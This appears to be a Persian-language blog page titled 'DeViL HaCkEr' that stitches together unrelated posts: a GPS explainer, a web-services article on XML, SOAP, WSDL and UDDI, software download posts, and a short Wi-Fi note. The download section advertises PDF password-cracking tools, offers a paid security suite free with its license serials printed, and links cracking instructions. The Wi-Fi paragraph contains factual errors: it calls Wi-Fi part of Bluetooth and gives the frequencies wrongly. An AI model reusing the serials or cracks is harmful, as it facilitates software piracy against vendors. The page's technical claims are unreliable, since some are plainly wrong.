.·´¯`·.·• DeViL HaCkEr •·.·´¯`·.

 

 GPS يعني سيستم موقعيت ياب جهاني اين سيستم تشكيل شده است از يك شبكه 24 ماهواره اي در مدار زمين كه توسط وزارت دفاع دولت آمريكا پشتيباني ميشود.

هـدف اصـلي و اولـيـه از طـراحـي GPS ، اهـداف نـظامـي بـوده امـا از ســال 1980 به بـعــد بـراي اسـتـفاده هاي غــير نـــــظامي نيز در دسترس قرار گرفت.

GPS در تمام شرايط بصورت 24 ساعت در شبانه روز و در تمام دنيا قابل استفاده مي باشد . و هيچ گونه بهائي بابت اين خدمات اخذ نمي شود.

GPS چطور كارمي كند ؟
ماهواره هاي GPS هر روز دوبار در يك مدار دقيق دور زمين ميگردند و سيگنال هاي حاوي اطلاعات را به زمين مي فرستند.

GPS براساس زمان مقايسه زمان ارسال و دريافت سيگنال توسط يك ماهواره كار مي كند . اختلاف زمان مشخص مي كند كه گيرندة GPS چقدر از ماهواره دور است . حال با انداره گيري مسافت از چند ماهواره گيرندة GPS ميتواند موقعيت كاربر را مشخص نموده حتي روي نقشه الكترو نيكي نمايش دهد.

يك گيرندة GPS بايستي حداقل سيگنالهاي 3 ماهواره را براي تعيين دقيق 2 موقعيت (طول و عرض جغرافيايي ) يك شيء دريافت نمايد و سيگنالهاي 4 ماهواره يا بيشتر ميتواند 3 موقعيت (طول و عرض جغرافيايي و ارتفاع ) را نشان دهد.

هم چنين ازGPS ميتوان براي اندازه گيري سرعت ، جهت يابي ، جستجو ، مسافرت طولاني ،‌رفتن به مقصد ، زمان طول و مغرب خورشيد و غيره نيز استفاده كرد .

سيستم ماهواره اي GPS:
24 مارهواره در بخش هاي مختلف فضاي زمين در مداري خاص با فاصله حدود 12000 مايلي بالاي سر ما قرار گرفته است.

آنها با يك سرعت ثابت در حركتند و در هر 24 ساعت دوبار دور زمين را با سرعتي معادل 7000 مايل در ساعت مي گردند.

ماهواره هاي GPS توسط انرژي خورشيد تغذيه ميشوند آنها مجهز به باطريهاي قابل شارژ اتوماتيك براي زمانهاي بارندگي يا خورشيد گرفتگي مي باشند.

yocket booster هاي كوچك روي هر ماهواره آنها را دريك مسير پروازي صحيح نگهداري مي كنند.

از ماهواره هاي GPS بيشتر بدانيد:

- اولين ماهواره GPS در سال 1978 با موفقيت به فضا پرتاب شد.
- درسال 1994 تمامي 24 ماهواره در مدار زمين قرار گرفت.
- هر ماهواره براي 10 سال مأموريت ساخته ميشود و پس از طي اين زمان حتماً بايستي ماهواره ديگر جايگزين گردد.
- وزن يك ماهواره GPS حدود 2000 پوند (معادل 907 كيلو گرم ) با 17 فوت عرض (18/5متر).
- قدرت انتقال آنها هم 50 وات يا كمتر مي باشد .

چگونه ميتوان يك GPS تهيه نمود ؟
چنانچه قصد خريد GPS را براي اولين بار داريد ما به شما اطلاعات مهمي را كه چه محصولاتي موجود بوده و مناسب كاربري در GPSS ميباشند را نشان مي دهيم.

در حقيقت دستگاه GPS با قيمت مناسب پيشنهادي ما Garmin Etrex با كابل مي باشد كه قيمت آن كمتر از 100 دلار آمريكاست اگر شما ساكن USA باشيد و نهايت 300 دلار آمريكا براي كشورهايي كه عوارض بالايي دارند باشد ، در انگليس نيز شما بايستي 110 دلار آمريكا بابت دستگاه GPSو 25 دلار نيز بابت كابل آن بپردازيد.

يك GPS دستي ارزان قيمت بدون هيچگونه نياز به LaptaP و با يك قيمت معقول قابليتهاي زيادي دارد.
هيچ بهايي بابت استفاده از خدمات GPS نبايستي توسط شما پرداخته شود . خدمات GPS توسط دولت آمريكا آماده شده و كاملاً مجاني مي باشد هم چنين دريافت اطلاعات توسط گوشي موبايل نيز ممكن ميباشد.

دسته بندي دستگاههاي GPS:
بطور كلي يك GPS را ميتوان از يكي از 3 گروه ذيل دانست.

GPS MOUSE : هيچ صفحه يا دكمه اي ندارد اما توسط يكpc Laptop با نرم افزار مربوطه قابل استفادة سرويس GPSS مي باشد.

دستگاههاي اين گروه مانند:

Garmin GPS 35
Delorme يا Rand Macnalley ( باقيمت هاي پايينتر)

قيمت اين GPS ها حدود 75 تا 150 دلار آمريكا متغير مي باشد. ولي فراموش نكنيد كه اين نوع GPS ها حتماً به Laptop pc نياز دارند.

Hand-Held GPS: اين نوع دستگاهها مي توانند بصورت سيار مورد استفاده قرار گيرند آنها خودشان يك‌صفحه كوچك جهت نمايش اطلاعات و چند دكمه دارند و در شكل ها و تركيب هاي مختلفي عرضه مي‌شوند و هيچگونه نيازي بهLaptop ندارند. كه بطور مثال ميتوان مدل‌هاي با قيمت پائين Garmin شبيه Etrex, GPS12*l , GPS12 يا مدل هاي 315, 310 ازMagellan را نام برد. تعدادي از اينها يك رابط NMEA و يك كابل رابط دارند قيمت با كابل ممكن است حدود 210 دلار به بالا باشد و ممكن است بعضي از كشورها ارزانتر هم موجود باشد.

يك GPS دستي ارزان قيمت با يك كابل رابط براي انتخاب و آغاز كار با GPS مناسب ميباشد, حتي براي سرگرمي يا كار يا آشنايي شما با طرز كار و خدمات GPS.

High-End GPS products: اين دستگاهها شامل يك صفحه نمايشگر بزرگتر و تعدادي نقشه ميباشند و در بعضي از آنها شما بايستي مبلغ بيشتري جهت نقشه ها بپردازيد.

قيمت اين دستگاهها ممكن است بسته به نوع محصول بالاتر از 1500 دلار آمريكا باشد كه نمونه هايي از آن مانند Blaupunkt PhihPs و Alpine ميباشد.

چه نوع GPS هايي مردم خريداري نموده اند ؟

در اينجا يك نمودار فروش انواع GPS در سال 200۴ , 2000 آورده شده است .

اين آمار براساس اطلاعات 100 مركز خدمات فروش دستگاههاي GPS ميباشد .

اين تحقيق كوچكي است ولي می تواند نشانگر خوبي از آمار فروش باشد . نشان ميدهد چطور مدل هاي Garmin بر تسلط خود بر انواع ديگر ادامه مي دهد .

البته به كمك GPS هاي دستي Etrex .

اين آمار هم چنين صعود تعدادي محصولات GPS Mouse شيبه Lassen Axiom Pharos , Holux , Haicom , Deluo و غيره.همراه با Delorme (Rockwell) .Rand Mcnalley(talon/NaVman) و , Pioneered در آمريكا را نشان مي دهد.

ديگر انواع GPS شامل: Eagle , Lowrance , Furuno , San jose , Silva , Smile , Trimble , Motorola.

كجا مي توانيم يك GPS تهيه كنيم ؟
امروزه سريعترين روش براي پيدا كردن يك عرضه كننده GPS مي تواند از طريق موتور جستجوگر Altavista باشد با نوشتن كلمه “ gps” در محل جستجوي اين سايت.

اما اگر نتوانستيد يك توزيع كننده GPS در كشورتان پيدا كنيد سعي كنيد به يكي از ليست هاي ذيل كه توزيع كننده هاي جهاني GPS ميباشند ارتباط برقرار نمائيد . آنها ممكن است از طريق email مشكل شما را حل نمايند يا اينكه كسي شما را در خصوص مشكلتان كمك نمايد .

اگر شما سايت GPSS Links pages را ببينيد شما يك طيف وسيعي از انواع GPS و مدل هاي آنرا كه قابل كار با GPS ميباشد را خواهيد پيدا كرد . كه اكثر آنها از نوع Garmin‌ ميباشد.

 

کسانی که با صنعت IT آشنايی دارند تتما ً نام وب سرويس را شنيده اند. برای مثال، بيش از ۶۶ درصد کسانی که در نظر سنجی مجله InfoWorld شرکت کرده بودند بر اين توافق داشتند که وب سرويس ها مدل تجاری بعدی اينترنت خواهند بود. به علاوه گروه گارتنر پيش بينی کرده است که وب سرويس ها کارآيی پروژه های IT را تا ۳۰ در صد بالا می برد. اما وب سرويس چيست و چگونه شکل تجارت را در اينترنت تغيير خواهد داد؟ برای ساده کردن پردازش های تجاری، برنامه های غيرمتمرکز (Enterprise) بايد با يکديگر ارتباط داشته باشند و از داده های اشتراکی يکديگر استفاده کنند. قبلا ً اين کار بوسيله ابداع استانداردهای خصوصی و فرمت داده ها به شکل مورد نياز هر برنامه انجام می شد. اما دنيای وب و XML تکنولوژی آزاد برای انتقال ديتا انتقال اطلاعات بين سيستم ها را افزايش داد. وب سرويس ها نرم افزارهايی هستند که از XML برای انتقال اطلاعات بين نرم افزارهای ديگر از طريق پروتکل های معمول اينترنتی استفاده می کنند. به شکل ساده يک وب سرويس از طريق وب اعمالی را انجام می دهد (توابع يا سابروتين ها) و نتايج را به برنامه ديگری می فرستد. اين يعنی برنامه ای که در يک کامپيوتر در تال اجراست اطلاعاتی را به کامپيوترديگری می فرستد و از آن درخواست جواب می کند. برنامه ای که در آن کامپيوتر دوم است کارهای خواسته شده را انجام می دهد و نتيجه را بر روی ساختارهای اينترنتی به برنامه اول برمی گرداند. وب سرويس ها می توانند از پروتکل های زيادی در اينترنت استفاده کنند اما بيشتر از HTTP که مهم ترين آنهاست استفاده می شود. وب سرويس هر نوع کاری می تواند انجام دهد. برای مثال در يک برنامه می تواند آخرين عنوان های اخبار را از وب سرويس Associated Press بگيرد يا يک برنامه مالی می تواند آخرين اخبار و اطلاعات بورس را از طريق وب سرويس بگيرد. کاری که وب سرويس انجام می دهد می تواند به سادگی ضرب دو عدد يا به پيچيدگی انجام کليه امور مشترکين يک شرکت باشد. وب سرويس دارای خواصی است که آن را از ديگر تکنولوژی ها و مدل های کامپيوتری جدا می کند. Paul Flessner، نايب رييس مايکروسافت در dot NET Enterprise Server چندين مشخصه برای وب سرويس در يکی از نوشته هايش ذکر کرده است. اول اينکه وب سرويس ها قابل برنامه ريزی هستند. يک وب سرويس کاری که می کند را در خود مخفی نگه می دارد. وقتی برنامه ای به آن اطلاعات داد وب سرويس آن را پردازش می کند و در جواب آن اطلاعاتی را به برنامه اصلی بر می گرداند. دوم، وب سرويس ها بر پايه XML بنا نهاده شده اند. XML و XML های مبتنی بر SOAP يا Simple Object Access Protocol تکنولوژی هايی هستند که به وب سرويس ها اين امکان را می دهد که با ديگر برنامه ها ارتباط داشته باشد تتی اگر آن برنامه ها در زبانهای مختلف نوشته شده و بر روی سيستم عامل های مختلفی در تال اجرا باشند. همچين وب سرويس ها خود-توصيف هستند. به اين معنی که کاری را که انجام می دهند و نتوه استفاده از خودشان را توضيت می دهند. اين توضيتات به طور کلی در WSDL يا Web Services Description Language نوشته می شود. WSDL يک استاندارد بر مبنای XML است. به علاوه وب سرويس ها قابل شناسايی هستند به اين معنی که برنامه نويس می تواند به دنبال وب سرويس مورد علاقه در دايرکتوری هايی مثل UDDI يا Universal Description , Discovery and Integration جستجو کند. UDDI يکی ديگر از استاندارد های وب سرويس است. نکات تکنولوژی وب سرويس همانطور که در ابتدا توضيت داده شد يکی از دلايل اينکه وب سرويس از ديگر تکنولوژی های موجود مجزا شده است استفاده از XML و بعضی استاندارد های تکنيکی ديگر مانند SOAP، WSDL و UDDI است. اين تکنولوژی ها زمينه ارتباط بين برنامه ها را ايجاد می کنند به شکلی که مستقل از زبان برنامه نويسی، سيستم عامل و سخت افزار است. SOAP يک مکانيزم ارتباطی را بين نرم افزار و وب سرويس ايجاد می کند. WSDL يک روش يکتا برای توصيف وب سرويس ايجاد می کند و UDDI يک دايرکتوری قابل جستجو برای وب سرويس می سازد. وقتی اينها با هم در يک جا جمع می شوند اين تکنولوژی ها به برنامه نويس اجازه می دهد که برنامه های خود را به عنوان سرويس آماده کرده و بر روی اينترنت قرار دهد. XML يا eXtensible Markup Language XML يک تکنولوژی است که به شکل گسترده از آن پشتيبانی می شود، همچنين اين تکنولوژی Open است به اين معنی که متعلق به شرکت خاصی نيست. اولين بار در کنسرسيوم WWW يا W3C در سال ۱۹۹۶ برای ساده کردن انتقال ديتا ايجاد شده است. با گسترده شدن استفاده از وب در دهه ۹۰ کم کم متدوديت های HTML مشخص شد. ضعف HTML در توسعه پذيری (قابليت اضافه و کم کردن خواص) و ضعف آن در توصيف ديتاهايی که درون خود نگهداری می کند برنامه نويسان را از آن نااميد کرد. همچنين مبهم بودن تعاريف آن باعث شد از توسعه يافتن باز بماند. در پاسخ به اين اشکالات W3C يک سری امکانات را در جهت توسعه HTML به آن افزود که امکان تغيير ساختار متنهای HTML مهم ترين آن است. اين امکان را CSS يا Cascade Style Sheet می نامند. اين توسعه تنها يک راه موقتی بود. بايد يک روش استاندارد شده، توسعه پذير و دارای ساختار قوی ايجاد می شد. در نتيجه W3C استاندارد XML را ساخت. XML دارای قدرت و توسعه پذيری SGML يا Standard Generalized Markup Language و سادگی که در ارتباط در وب به آن نياز دارد است. استقلال اطلاعات يا جدا بودن متتوا از ظاهر يک مشخصه برای XML به تساب می آيد. متنهای XML فقط يک ديتا را توصيف می کنند و برنامه ای که XML برای آن قابل درک است بدون توجه به زبان و سيستم عامل قادر است به اطلاعات درون فايل XML هر گونه شکلی که مايل است بدهد. متنهای XML تاوی ديتا هستند بدون شکل خاص، بنابراين برنامه ای که از آن می خواهد استفاده کند بايد بداند که چگونه می خواهد آن اطلاعات را نمايش دهد. بنابراين نتوه نمايش يک فايل XML در يک PC با PDA و تلفن همراه می تواند متفاوت باشد. وقتی يک برنامه با متن XML مواجه می شود بايد مطمئن باشد که آن متن تاوی ديتای مورد نظر خود است. اين اطمينان توسط برنامه هايی با نام XML Parser تاصل می شود. تجزيه کننده ها دستورات متن XML را بررسی می کنند. همچنين آنها به برنامه کمک می کنند تا متن های XML را تفسير کند. به صورت اختياری هر متن XML می تواند به متن ديگری اشاره کند که تاوی ساختار فايل XML اصلی باشد. به آن متن XML دوم DTD يا Document Type Definition گفته می شود. وقتی فايل XML به DTD اشاره می کند برنامه تجزيه کننده فايل اصلی را با DTD بررسی می کند که آيا به همان ساختاری که در DTD توصيف شده شکل گرفته است يا خير. اگر يک تجزيه کننده XML بتواند يک متن را به درستی پردازش کند متن XML نيز به شکل صتيتی فرمت شده است. وقتی که اکثر نرم افزارها امکانات وبی خود را افزايش دادند اين طور به نظر می رسد که XML به عنوان يک تکنولوژی جهانی برای فرستادن اطلاعات بين برنامه ها انتخاب شود. تمامی برنامه هايی که از XML استفاده می کنند قادر خواهند بود که XML ِ همديگر را بفهمند. اين سطت بالای تطابق بين برنامه ها باعث می شود که XML يک تکنولوژی مناسب برای وب سرويس باشد. چون بدون اينکه اتتياج به سيستم عامل و سخت افزار يکسان باشد می تواند اطلاعات را جابجا کند. SOAP يا Simple Object Access Protocol SOAP يکی از عمومی ترين استاندارد هايی است که در وب سرويس ها استفاده می شود. طبق شواهد اولين بار توسط DeveloperMentor، شرکت UserLand و مايکروسافت در سال ۱۹۹۸ ساخته شده و نسخه اول آن در سال ۱۹۹۹ ارايه شده است. آخرين نسخه SOAP، نسخه 1.2 بود که در دسامبر سال ۲۰۰۱ در W3C ارايه شد. نسخه 1.2 نشان دهنده کار زياد بر روی آن و نمايانگر اشتياق زياد صنعت IT برای استفاده از SOAP و وب سرويس است. هدف اصلی SOAP ايجاد روشی جهت فرستادن ديتا بين سيستم هايی است که بر روی شبکه پخش شده اند. وقتی يک برنامه شروع به ارتباط با وب سرويس می کند، پيغام های SOAP وسيله ای برای ارتباط و انتقال ديتا بين آن دو هستند. يک پيغام SOAP به وب سرويس فرستاده می شود و يک تابع يا سابروتين را در آن به اجرا در می آورد به اين معنی که اين پيغام از وب سرويس تقاضای انجام کاری را دارد. وب سرويس نيز از متتوای پيغام SOAP استفاده کرده و عمليات خود را آغاز می کند. در انتها نيز نتايج را با يک پيغام SOAP ديگر به برنامه اصلی می فرستد. به عنوان يک پروتکل مبتنی بر XML، پروتکل SOAP تشکيل شده از يک سری الگوهای XMLی است. اين الگوها شکل پيغام های XML را که بر روی شبکه منتقل می شود را مشخص می کند. مانند نوع ديتاها و اطلاعاتی که برای طرف مقابل تفسير کردن متن را آسان کند. در اصل SOAP برای انتقال ديتا بر روی اينترنت و از طريق پروتکل HTTP طراتی شده است ولی از آن در ديگر مدلها مانند LAN نيز می توان استفاده کرد. وقتی که وب سرويس ها از HTTP استفاده می کنند به راتتی می توانند از Firewall عبور کنند. يک پيغام SOAP از سه بخش مهم تشکيل شده است: پوشش يا Envelope ،Header، بدنه يا Body. قسمت پوشش برای بسته بندی کردن کل پيغام به کار می رود. اين بخش متتوای پيغام را توصيف و گيرنده آن را مشخص می کند. بخش بعدی پيغام های SOAP، Header آن است که يک بخش اختياری می باشد و مطالبی مانند امنيت و مسيريابی را توضيت می دهد. بدنه پيغام SOAP بخشی است که ديتاهای مورد نظر در آن جای می گيرند. ديتاها بر مبنای XML هستند و از يک مدل خاص که الگوها (Schemas) آن را توضيت می دهند تبعيت می کنند. اين الگو ها به گيرنده کمک می کنند تا متن را به درستی تفسير کند. پيغام های SOAP توسط سرورهای SOAP گرفته و تفسير می شود تا در نتيجه آن، وب سرويس ها فعال شوند و کار خود را انجام دهند. برای اينکه از SOAP در وب سرويس استفاده نکنيم از تعداد زيادی پروتکل بايد استفاده شود. برای مثال XML-RPC تکنولوژی قديمی تری بود که همين امکانات را ايجاد می کرد. به هر تال، خيلی از سازندگان بزرگ نرم افزار SOAP را بر تکنولوژی های ديگر ترجيت دادند. دلايل زيادی برای انتخاب SOAP وجود دارد که خيلی از آنها درباره پروتکل آن است که فراتر از اين متن می باشد. سه برتری مهم SOAP نسبت به تکنولوژی های ديگر عبارتند از قابليت توسعه، سادگی و قابليت عملکرد داخلي. پيغام های SOAP معمولا ً کدهای زيادی ندارند و برای فرستادن و گرفتن آن به نرم افزارهای پيچيده نياز نيست. SOAP اين امکان را به برنامه نويس می دهد تا بنا به نياز خود آن را تغيير دهد. در آخر بدليل اينکه SOAP از XML استفاده می کند می تواند بوسيله HTTP اطلاعات را انتقال بدهد بدون اينکه زبان برنامه نويسی، سيستم عامل و سخت افزار برای آن مهم باشد. WSDL يا Web Services Description Language استاندارد ديگری که نقش اساسی در وب سرويس بازی می کند WSDL است. همانطور که قبلا ً اشاره کرديم يکی از خواص وب سرويس ها توصيف خود آنهاست به اين معنی که وب سرويس دارای اطلاعاتی است که نتوه استفاده از آن را توضيت می دهد. اين توضيتات در WSDL نوشته می شود، متنی به XML که به برنامه ها می گويد اين وب سرويس چه اطلاعاتی لازم دارد و چه اطلاعاتی را بر می گرداند. وقتی که سازندگان نرم افزار برای اولين بار SOAP و ديگر تکنولوژی های وب سرويس را ساختند دريافتند که برنامه ها قبل از اينکه شروع به استفاده از يک وب سرويس بکنند بايد اطلاعاتی درباره آن را داشته باشند. اما هر کدام از آن سازندگان برای خودشان روشی برای ايجاد اين توضيتات ابداع کردند و باعث شد که وب سرويس ها با هم هماهنگ نباشد. وقتی IBM و مايکروسافت تصميم گرفتند تا استاندارد های خود را يکسان کنند WSDL بوجود آمد. در ماه مارس سال ۲۰۰۱ مايکروسافت، IBM و Ariba نسخه 1.1 را به W3C ارائه کردند. گروهی از W3C بر روی اين استاندارد کار کردند و آن را پذيرفتند. هم اکنون اين تکنولوژی در دست ساخت است و هنوز کامل نشده. ولی هم اکنون اکثر سازندگان وب سرويس از آن استفاده می کنند. هر وب سرويسی که بر روی اينترنت قرار می گيرد دارای يک فايل WSDL است که مشخصات، مکان و نتوه استفاده از وب سرويس را توضيت می دهد. يک فايل WSDL نوع پيغام هايی که وب سرويس می فرستد و می گيرد را توضيت می دهد مانند پارامترهايی که برنامه صدا زننده برای کار با وب سرويس بايد به آن بفرستد. در تئوری يک برنامه در وب برای يافتن وب سرويس مورد نظر خود از روی توضيتات WSDL ها جستجو می کند. در WSDL اطلاعات مربوط به چگونگی ارتباط با وب سرويس بر روی HTTP يا هر پروتکل ديگر نيز وجود دارد. اين مهم است که بدانيم WSDL برای برنامه ها طراتی شده است نه برای خواندن آن توسط انسان. شکل فايلهای WSDL پيچيده به نظر می آيد ولی کامپيوترها می توانند آن را بخوانند و تجزيه و تتليل بکند. خيلی از نرم افزارهايی که وب سرويس می سازند فايل WSDL مورد نياز وب سرويس را نيز توليد می کنند بنابراين وقتی برنامه نويس وب سرويس خود را ساخت به شکل خودکار WSDL مورد نياز با آن نيز ساخته می شود و اتتياجی به آموزش دستورات WSDL برای ساختن و استفاده از وب سرويس نيست. UDDI يا Universal Description , Discovery and Integration سومين استاندارد اصلی وب سرويس ها، يعنی UDDI، به شرکتها و برنامه نويسان اجازه می دهد تا وب سرويس های خود را بر روی اينترنت معرفی کنند. اين استاندارد در اصل بوسيله مايکروسافت، IBM و Ariba و پنجاه شرکت بزرگ ديگر ساخته شده است. با استفاده از UDDI شرکتها می توانند اطلاعات خود را در اختيار شرکت های ديگر قرار بدهند و مدل B2B ايجاد کنند. همان طور که از نام آن مشخص است شرکت ها می توانند وب سرويس خود را معرفی کنند، با وب سرويس ديگران آشنا شوند و از آن در سيستم های خود استفاده کنند. اين استاندارد جديدی است و در سال ۲۰۰۰ ساخته شده است و کنسرسيومی از شرکتهای صنعتی در تال کار بر روی آن هستند. نسخه دوم UDDI در ماه ژوئن سال ۲۰۰۱ ارائه شد و نسخه سوم آن در دست ساخت است. UDDI يک متن مبتنی بر XML را تعريف می کند که در آن شرکت ها توضيتاتی درباره چگونگی کار وب سرويس شرکتشان و امکانات خود می دهند. برای تعريف اين اطلاعات از شکل خاصی که در UDDI توضيت داده شده استفاده می شود. شرکت ها می توانند اين اطلاعات را در UDDI شرکت خود نگهداری کنند و تنها به شرکت های مورد نظرشان اجازه دستيابی به آنها را بدهند يا آنها را در مکان عمومی و در اينترنت قرار دهند. بزرگترين و مهمترين پايگاه UDDI پايگاه UDDI Business Registry يا UBR نام دارد و توسط کميته UDDI طراتی و اجرا شده است. اطلاعات اين پايگاه در چهار نقطه نگهداری می شود: مايکروسافت، IBM، SAP و HP. اطلاعاتی که در يکی از چهار پايگاه تغيير کند در سه تای ديگر نيز اعمال می شود. اطلاعات درون اين پايگاه ها شبيه دفترچه تلفن است. White Pages که در آنها اطلاعات تماس شرکت ها و توضيتات متنی آنهاست، Yellow Pages تاوی اطلاعات طبقه بندی شده شرکتها و اطلاعات درباره توانايی های الکترونيکی آنها می باشد، Green Pages، تاوی اطلاعات تکنيکی درباره سرويس های آنها و نتوه پردازش اطلاعات شرکت آنها می باشد. اطلاعات تجاری و سرويس های شرکت ها کاملا ً طبقه بندی شده است و اجازه می دهد که به راتتی در آنها جستجو کرد. سپس متخصصان IT می توانند از اين اطلاعات استفاده کرده و شرکت ها را برای خدمات بهتر به هم متصل کنند. با اين شرت UDDI امکان پياده سازی مدل B2B را ايجاد می کند و شرکتها می توانند از سرويس های يکديگر استفاده کنند. شرکت هايی که به UDDI علاقه نشان داده اند قدرتمند هستند و خيلی از آنها از وب سرويس و استانداردهای آن در متصولات خود استفاده می کنند. NTT Communications of Tokyo يکی از شرکت هايی است که در تال اضافه کردن توضيتاتی به ساختار UDDI است. در هر تال تاضر شرکت ها هنوز کمی درباره وارد کردن خود در پايگاه های عمومی متتاط هستند. اين چيز عجيبی نيست. شرکتها ابتدا اين امکانات را فقط برای شرکای خود ايجاد می کنند. شرکتهای بزرگ نيز برای مديريت بر سرويس های خود و اشتراک آنها بين قسمت های مختلف از اين استاندارد استفاده می کنند. وقتی اين استاندارد به تد بلوغ خود برسد و کاربران با آن اتساس راتتی بکنند استفاده از آن نيز در مکان های عمومی فراگير خواهد بود. اين تغيير رويه برای شرکت های بزرگی که B2B را به روش های قديمی اجرا کرده بودند مشکل است. بعضی نيز اشکال امنيتی بر اين روش می گيرند و مايل نيستند اطلاعاتشان را بدهند. اما با گذشت زمان و کامل شدن اين تکنولوژی و درک لزوم استفاده از آن شرکت ها چاره ای جز استفاده از آن ندارند.

 ۲ تا نرم افزار برای کرک کردن پسورد فایلهای pdf
PDF Password Cracker 0.96MB Site in US
PDF Password Cracker Pro 1.70MB Site in US

---

جدا سازی صدا از موزیک 

دانلود - 9 مگابایت

---

 Download HTML2PDF Pilot 2.11

نرم افزاری برای تبدیل صفحات html به pdf برای درست کردن مقاله

 Size : 1.65 MB

Download

---

BitDefender Internet Security v10.108 -

 جدیدترین نسخه ی بسته ی امنیتی کامل شرکت BitDefender می باشد که به تازگی به روز عرضه شده است. شایان ذکر است که نسخه های آزمایشی این نرم افزار پیش از این بر روی سایت آی آر تیک قرار داشت که با ارایه نسخه ی نهایی ، دیگر وفت آن رسیده است که با نصب به روزترین راه حل امنیتی شرکت فوق الذکر، تجربه ی شیرینی را از کار کردن با رایانه و اینترنت تجربه کنیم. این برنامه دارای برنامه های ضد ویروس (AntiVirus) ، دیوار آتشین (Firewall)، ضد هرزنامه (AntiSpam) و همچنین ضد برنامه های جاسوسی (AntiSpyware) می باشد. دیگر نیازی نیست که همه ی برنامه ها را جداگانه نصب کنید، چرا که با نصب این بسته همه ی این ویژگیها را یک جا خواهید داشت. این مجموعه را دریافت ، با سریال اختصاصی آن ثبت و به روز کنید و دیگر نگران هیچ مشکل امنیتی که سیستم شما را تهدید کند نباشید. در مقایسه با برنامه ی گران قیمت Norton و McAfee این برنامه بسیار سریع اجرا می شود و بسیار دقیق عمل می کند. نمونه ی آن است که بیش از 1264 هرزنامه را از ایمیل من بدون هیچ اشتباهی شناسایی و پاکسازی کرد. قیمت این بسته ی امنیتی 69$ می باشد که به صورت رایگان دراختیار شما قرار می گیرد.

دانلود

( Size : 26,210 Kb )

Serials:

4BFFC802217BEBCB4656 -

45ECF7E810D0E4AFD492

---

 Microsoft Virtual PC 2007 1.0

 به جدیدترین عضو خانواده ی بزرگ مایکروسافت ، یعنی Virtual PC 2007 خوش آمدگویی می کنیم. بعد از پروژه ی موفق سال 2004 این برنامه، حال نوبت آن رسیده است تا نسل جدید نرم افزارهای کاربردی را تجربه کنید. پیش از این آی آر تیک، نسخه ی بتای این محصول را پیش از انتشار در اختیار شما قرارداد و حال نسخه ی نهایی محصول را تقدیم می دارد. این برنامه چیست و چه کار می کند ؟ برنامه ی Virtual PC به شما این امکان را می دهد تا چند سیستم عامل گوناگون را به صورت همزمان بر روی یک رایانه نصب نمایید. تعویض میان سیستم عامل ها تنها با یک کلید می باشد. با استفاده از این بسته ی نرم افزاری قادر خواهید بود تا نرم افزارهای گوناگون خود را به راحتی بر روی سیستم عامل دلخواه خویش نصب نمایید و یا کیفیت آن بررسی نمایید. برای کسب اطلاعات کامل در مورد نحوه ی عملکرد این نرم افزار به بخش انگلیسی این پست مراجعه نمایید. این برنامه به تازگی در بخش دانلود شرکت مایکروسافت قرار گرفته است و شما نسخه ی Final آن را از آی آر تیک دریافت می نمایید. به همه ی کاربران حرفه ای توصیه می کنیم که نسخه ی جدید این برنامه را از دست ندهند

 دانلود

---

 PHP Designer

نام نرم افزاری می باشد که برنامه نویسان وب که با زبان برنامه نویسی php آشنایی دارند و یا به طور حرفه ای برای طراحی صفحات وب سایت از این زبان برنامه نویسی استفاده می کنند محیطی را فراهم می کند تا کد ها و عملیات طراحی را در آن انجام دهند.

  نرم افزار مترجم پارس : یک سیستم ترجمه ماشینی است که متن انگلیسی را به جمله های فارسی ترجمه می نماید. در حال حاضر دو مترجم انگلیسی به فارسی "پدیده" و "پارس" مورد استفاده ی کاربران اینترنتی قرار می گیرد. و حال در مورد مترجم پارس اطلاعاتی را در اختیار شما قرار می دهیم.

اولین نگارش تجاری مترجم در شهریور ماه 1376 به عموم عرضه گردید و آخرین نگارش ارتقاء یافته مترجم پارس در خرداد ماه 1383 ارائه شده است .در سیستم ورودی مترجم پارس، تایپ متن انگلیسی یا انتخاب محتویات از یک فایل استفاده می گردد.در حال حاضر، موتور مترجم پارس قادر به شناسایی و تجزیه بیش از یک میلیون و پانصدهزار واژه عمومی و اصطلاحات تخصصی متداول در 38 رشته علمی است .بانک واژگان و اصطلاحات مترجم پارس همواره در حال بهینه شدن و ارتقاء توسط همکاران ما در مراکز علمی و دانشگاهی می باشد.توجه : آی آر تیک بر این باور است که رشد و توسعه نرم افزارهای ایرانی به حمایت های مالی مصرف کننده نیازمند است. چنانچه این برنامه نیازهای شما را تامیین می کند، می توانید با خرید نسخه ی اصل آن از برنامه نویسان و شرکت تولید کننده این محصول حمایت کنید
ارایه ی این برنامه تنها جنبه ی آموزشی دارد

---

 لينك مستقيم به همراه نحوه ي كرك كردن :

دانلود نرم افزار با حجم ۲۶.۷ مگابایت
پاسورد فایل : www.kamyabonline.com

 
اين استاندارد از زيرمجموعه Bluetooth است و تحت آن ارتباطى با قدرتى بيشتر از خود Bluetooth ايجاد خواهد شد. ارتباط Wi-Fi كه مخفف Wireless Fidelity است بيشتر بر پايه ارتباط شبكه اينترنت به صورت بى سيم تاكيد مى كند و همين امر باعث محبوبيت بسيار زياد آن شده است با استفاده از اين تكنولوژى به راحتى در مسافرت، هواپيما و يا هتل مى توان از طريق Laptop به اينترنت متصل شد. Wi-Fi كه همان استاندارد IEEE802.11 است در مدل هاى ۸۰۲.11a و ۸۰۲.11b مورد استفاده قرار مى گيرد و استاندارد اصلى آن IEEE802.11b است. در اين مدل حداكثر سرعت انتقال اطلاعات ۱۱Mbps است و از فركانس راديويى ۴/۲ گيگاهرتز استفاده مى كند. براى سرعت بخشيدن به اين استاندارد مدل ديگرى نيز به نام ۸۰۲.11b+ ايجاد شده كه سرعت انتقال را تا ۲۲mbps افزايش مى دهد. در مدل ۸۰۲.11a سرعت اطلاعات حدود ۵۴mbps است و از فركانس ۵۰GHz استفاده مى شود. به طور حتم اين مدل در آينده اى نه چندان دور جاى ۸۰۲.11b را خواهد گرفت.

